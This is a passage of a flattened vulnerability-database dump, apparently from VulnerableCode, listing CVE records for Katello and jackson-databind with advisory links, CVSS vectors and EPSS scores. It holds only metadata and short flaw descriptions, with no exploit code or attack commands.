scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14825
7
reference_url https://github.com/Katello/katello
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/Katello/katello
8
reference_url https://github.com/Katello/katello/commit/332484232b66b7907a8104a19ea97eb697b75c79
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/Katello/katello/commit/332484232b66b7907a8104a19ea97eb697b75c79
9
reference_url https://github.com/Katello/katello/commit/4eefa678a905140620ca8b390d48fe318d36e4ea
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/Katello/katello/commit/4eefa678a905140620ca8b390d48fe318d36e4ea
10
reference_url https://github.com/Katello/katello/commits/3.12.2
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/Katello/katello/commits/3.12.2
11
reference_url https://github.com/Katello/katello/pull/8244
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/Katello/katello/pull/8244
12
reference_url https://github.com/Katello/katello/pull/8253
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/Katello/katello/pull/8253
13
reference_url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/katello/CVE-2019-14825.yml
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/rubysec/ruby-advisory-db/blob/master/gems/katello/CVE-2019-14825.yml
14
reference_url https://nvd.nist.gov/vuln/detail/CVE-2019-14825
reference_id
reference_type
scores
0
value 4.0
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:S/C:P/I:N/A:N
1
value 4.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N
2
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
3
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2019-14825
15
reference_url https://projects.theforeman.org/issues/27485
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://projects.theforeman.org/issues/27485
16
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:theforeman:katello:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:theforeman:katello:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:theforeman:katello:*:*:*:*:*:*:*:*
17
reference_url https://github.com/advisories/GHSA-m4wh-848j-9w2r
reference_id GHSA-m4wh-848j-9w2r
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-m4wh-848j-9w2r
fixed_packages
aliases CVE-2019-14825, GHSA-m4wh-848j-9w2r
risk_score 1.9
exploitability 0.5
weighted_severity 3.7
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-bsbd-bsbq-7qdk
31
url VCID-bydt-bkf4-rbh2
vulnerability_id VCID-bydt-bkf4-rbh2
summary 
jackson-databind mishandles the interaction between serialization gadgets and typing
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config).
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-9546.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-9546.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-9546
reference_id
reference_type
scores
0
value 0.02327
scoring_system epss
scoring_elements 0.8482
published_at 2026-04-13T12:55:00Z
1
value 0.02327
scoring_system epss
scoring_elements 0.84761
published_at 2026-04-02T12:55:00Z
2
value 0.02327
scoring_system epss
scoring_elements 0.84746
published_at 2026-04-01T12:55:00Z
3
value 0.02327
scoring_system epss
scoring_elements 0.84825
published_at 2026-04-12T12:55:00Z
4
value 0.02327
scoring_system epss
scoring_elements 0.84829
published_at 2026-04-11T12:55:00Z
5
value 0.02327
scoring_system epss
scoring_elements 0.8481
published_at 2026-04-09T12:55:00Z
6
value 0.02327
scoring_system epss
scoring_elements 0.84804
published_at 2026-04-08T12:55:00Z
7
value 0.02327
scoring_system epss
scoring_elements 0.84781
published_at 2026-04-07T12:55:00Z
8
value 0.02327
scoring_system epss
scoring_elements 0.8478
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-9546
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9546
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9546
3
reference_url https://github.com/FasterXML/jackson-databind
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind
4
reference_url https://github.com/FasterXML/jackson-databind/issues/2631
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/issues/2631
5
reference_url https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E
6
reference_url https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E
7
reference_url https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E
8
reference_url https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E
9
reference_url https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E
10
reference_url https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E
11
reference_url https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E
12
reference_url https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E
13
reference_url https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E
14
reference_url https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html
15
reference_url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062
16
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-9546
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-9546
17
reference_url https://security.netapp.com/advisory/ntap-20200904-0006
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20200904-0006
18
reference_url https://security.netapp.com/advisory/ntap-20200904-0006/
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20200904-0006/
19
reference_url https://www.oracle.com/security-alerts/cpujan2021.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujan2021.html
20
reference_url https://www.oracle.com/security-alerts/cpujul2020.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujul2020.html
21
reference_url https://www.oracle.com/security-alerts/cpuoct2020.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2020.html
22
reference_url https://www.oracle.com/security-alerts/cpuoct2021.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuoct2021.html
23
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1816332
reference_id 1816332
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1816332
24
reference_url https://github.com/advisories/GHSA-5p34-5m6p-p58g
reference_id GHSA-5p34-5m6p-p58g
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5p34-5m6p-p58g
25
reference_url https://access.redhat.com/errata/RHSA-2020:1644
reference_id RHSA-2020:1644
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1644
26
reference_url https://access.redhat.com/errata/RHSA-2020:2067
reference_id RHSA-2020:2067
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2067
27
reference_url https://access.redhat.com/errata/RHSA-2020:2511
reference_id RHSA-2020:2511
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2511
28
reference_url https://access.redhat.com/errata/RHSA-2020:2512
reference_id RHSA-2020:2512
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2512
29
reference_url https://access.redhat.com/errata/RHSA-2020:2513
reference_id RHSA-2020:2513
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2513
30
reference_url https://access.redhat.com/errata/RHSA-2020:2515
reference_id RHSA-2020:2515
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2515
31
reference_url https://access.redhat.com/errata/RHSA-2020:2813
reference_id RHSA-2020:2813
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:2813
32
reference_url https://access.redhat.com/errata/RHSA-2020:3192
reference_id RHSA-2020:3192
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3192
33
reference_url https://access.redhat.com/errata/RHSA-2020:3196
reference_id RHSA-2020:3196
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3196
34
reference_url https://access.redhat.com/errata/RHSA-2020:3197
reference_id RHSA-2020:3197
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3197
35
reference_url https://access.redhat.com/errata/RHSA-2020:3779
reference_id RHSA-2020:3779
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:3779
36
reference_url https://access.redhat.com/errata/RHSA-2020:4366
reference_id RHSA-2020:4366
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:4366
37
reference_url https://access.redhat.com/errata/RHSA-2025:1746
reference_id RHSA-2025:1746
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:1746
38
reference_url https://usn.ubuntu.com/USN-4813-1/
reference_id USN-USN-4813-1
reference_type
scores
url https://usn.ubuntu.com/USN-4813-1/
fixed_packages
aliases CVE-2020-9546, GHSA-5p34-5m6p-p58g
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-bydt-bkf4-rbh2
32
url VCID-ceub-d4s9-dkcd
vulnerability_id VCID-ceub-d4s9-dkcd
summary 
Deserialization of Untrusted Data
A deserialization flaw was discovered in the jackson-databind which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the `readValue` method of the `ObjectMapper`.
references
0
reference_url https://access.redhat.com/errata/RHSA-2017:3189
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:3189
1
reference_url https://access.redhat.com/errata/RHSA-2017:3190
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2017:3190
2
reference_url https://access.redhat.com/errata/RHSA-2018:0342
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:0342
3
reference_url https://access.redhat.com/errata/RHSA-2018:0478
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:0478
4
reference_url https://access.redhat.com/errata/RHSA-2018:0479
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:0479
5
reference_url https://access.redhat.com/errata/RHSA-2018:0480
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:0480
6
reference_url https://access.redhat.com/errata/RHSA-2018:0481
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:0481
7
reference_url https://access.redhat.com/errata/RHSA-2018:0576
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:0576
8
reference_url https://access.redhat.com/errata/RHSA-2018:0577
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:0577
9
reference_url https://access.redhat.com/errata/RHSA-2018:1447
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:1447
10
reference_url https://access.redhat.com/errata/RHSA-2018:1448
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:1448
11
reference_url https://access.redhat.com/errata/RHSA-2018:1449
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:1449
12
reference_url https://access.redhat.com/errata/RHSA-2018:1450
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:1450
13
reference_url https://access.redhat.com/errata/RHSA-2018:1451
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:1451
14
reference_url https://access.redhat.com/errata/RHSA-2018:2927
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2018:2927
15
reference_url https://access.redhat.com/errata/RHSA-2019:2858
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:2858
16
reference_url https://access.redhat.com/errata/RHSA-2019:3149
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:3149
17
reference_url https://access.redhat.com/errata/RHSA-2019:3892
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2019:3892
18
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-15095.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2017-15095.json
19
reference_url https://api.first.org/data/v1/epss?cve=CVE-2017-15095
reference_id
reference_type
scores
0
value 0.08606
scoring_system epss
scoring_elements 0.92427
published_at 2026-04-13T12:55:00Z
1
value 0.08606
scoring_system epss
scoring_elements 0.92429
published_at 2026-04-12T12:55:00Z
2
value 0.09261
scoring_system epss
scoring_elements 0.92697
published_at 2026-04-01T12:55:00Z
3
value 0.09261
scoring_system epss
scoring_elements 0.9273
published_at 2026-04-11T12:55:00Z
4
value 0.09261
scoring_system epss
scoring_elements 0.92724
published_at 2026-04-09T12:55:00Z
5
value 0.09261
scoring_system epss
scoring_elements 0.9272
published_at 2026-04-08T12:55:00Z
6
value 0.09261
scoring_system epss
scoring_elements 0.92709
published_at 2026-04-07T12:55:00Z
7
value 0.09261
scoring_system epss
scoring_elements 0.92711
published_at 2026-04-04T12:55:00Z
8
value 0.09261
scoring_system epss
scoring_elements 0.92705
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2017-15095
20
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15095
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15095
21
reference_url https://github.com/FasterXML/jackson-databind
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind
22
reference_url https://github.com/FasterXML/jackson-databind/commit/a054585e2175ad0882f07bcafedecfac86230f1b
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/a054585e2175ad0882f07bcafedecfac86230f1b
23
reference_url https://github.com/FasterXML/jackson-databind/commit/a3939d36edcc755c8af55bdc1969e0fa8438f9db
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/a3939d36edcc755c8af55bdc1969e0fa8438f9db
24
reference_url https://github.com/FasterXML/jackson-databind/commit/ddfddfba6414adbecaff99684ef66eebd3a92e92
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/ddfddfba6414adbecaff99684ef66eebd3a92e92
25
reference_url https://github.com/FasterXML/jackson-databind/commit/e865a7a4464da63ded9f4b1a2328ad85c9ded78b
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/e865a7a4464da63ded9f4b1a2328ad85c9ded78b
26
reference_url https://github.com/FasterXML/jackson-databind/commit/e8f043d1aac9b82eee907e0f0c3abbdea723a935
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/commit/e8f043d1aac9b82eee907e0f0c3abbdea723a935
27
reference_url https://github.com/FasterXML/jackson-databind/issues/1680
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/issues/1680
28
reference_url https://github.com/FasterXML/jackson-databind/issues/1737
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/FasterXML/jackson-databind/issues/1737
29
reference_url https://github.com/tolbertam/jackson-databind/commit/80566a0f96b2003863f9d8f9ccc3b562001e147b
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/tolbertam/jackson-databind/commit/80566a0f96b2003863f9d8f9ccc3b562001e147b
30
reference_url https://lists.apache.org/thread.html/f095a791bda6c0595f691eddd0febb2d396987eec5cbd29120d8c629@%3Csolr-user.lucene.apache.org%3E
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/f095a791bda6c0595f691eddd0febb2d396987eec5cbd29120d8c629@%3Csolr-user.lucene.apache.org%3E
31
reference_url https://lists.debian.org/debian-lts-announce/2020/01/msg00037.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2020/01/msg00037.html
32
reference_url https://security.netapp.com/advisory/ntap-20171214-0003
reference_id
reference_type
scores
0
